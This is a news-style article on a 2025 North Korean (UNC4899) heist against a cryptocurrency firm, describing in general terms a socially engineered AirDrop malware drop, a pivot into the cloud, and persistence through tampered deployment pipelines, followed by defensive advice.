Cybercrime has caused many significant digital thefts in the cryptocurrency industry; however, the recent activity of a North Korean hacking organization marks an even greater advancement in stealth tactics to gain access to networks. In a well-planned attack by UNC4899 against a cryptocurrency company in 2025, millions of dollars in digital assets were extracted from the organization. The combination of simple social engineering and advanced exploitation of cloud-based services demonstrated that a targeted corporation could be compromised via the transfer of an innocuous single data file even when it had highly secure corporate networks.
The AirDrop Trap
A multi-million dollar heist was launched initially by a simple conversation. Hackers reached out to a developer at the firm they wanted to attack and pretended to want to collaborate with him on an open-source project to build their credibility over time. Eventually, the attackers convinced the developer to download an archive of their project to his workstation. Thinking the archived file was a legitimate file, the developer transferred it from his phone to his corporate workstation using Apple’s AirDrop function. What the developer did not know is that the transfer to the workstation would contain a hidden malicious payload that was a normal system management tool and which was coded in Python. This single act was the one and only way for the attackers to gain access into the perimeter of the network.
Pivoting to the Cloud
Once the malware executed on the developer’s corporate machine, the attackers had their foot in the door. Their final objective, though, resided in the company’s cloud infrastructure. Malicious binaries acted as backdoors to allow hackers to enter authenticated sessions and subsequently shift directly into the broader cloud environment belonging to the company. Cybersecurity experts from Google Cloud noted that jumping from a personal file transfer to a corporate cloud network represents a highly dangerous evolution in modern cybercrime.
Rewriting the Security Rules
After gaining access to the company’s internal cloud setup, the hackers methodically dismantled the existing security barriers. Operating within the firm’s infrastructure, the UNC4899 group used stolen service account tokens to dramatically elevate their administrative privileges. The attackers have modified the company’s multi-factor authentication to ensure that they are able to access accounts without interruption. With digital alarms being disabled, the attackers could move into sensitive areas of the network (such as customer production databases and large amounts of cryptocurrency). They then gained access to insecurely stored database login information, which provided the ability to reset passwords on high-value accounts without issue.
The Automated Backdoor
It takes tremendous technical expertise to ensure ongoing access to a system after having stolen many millions of dollars. By deliberately targeting the automated development pipelines of the company, North Korean hackers have been able to maintain access to the target company’s network by inserting malicious commands into the target company’s deployment configurations. Therefore, each time a server would spin up an automated procedure, the target company’s system would unknowingly download backdoor access for its hackers. The resulting deep persistence of access for the hackers has enabled them to covertly manipulate user accounts and draw funds from digital currencies before they can be detected as having used those accounts.
Defending Against the Next Threat
The expansion of the crypto industry has led to an increase in state-sponsored hacking groups employing advanced artificial intelligence and sophisticated social engineering techniques to target development teams. Security experts strongly recommend companies create “walls” between their cloud environments and their typical corporate devices as a measure against such events happening again. Furthermore, businesses should implement effective peer-to-peer file sharing restrictions (e.g., No AirDrop in the Workplace), and create and strictly enforce phishing-resistant authentication protocols. As long as the industry fails to adopt a universal standard for secret management, the potential for the next unseen heist will remain significant.
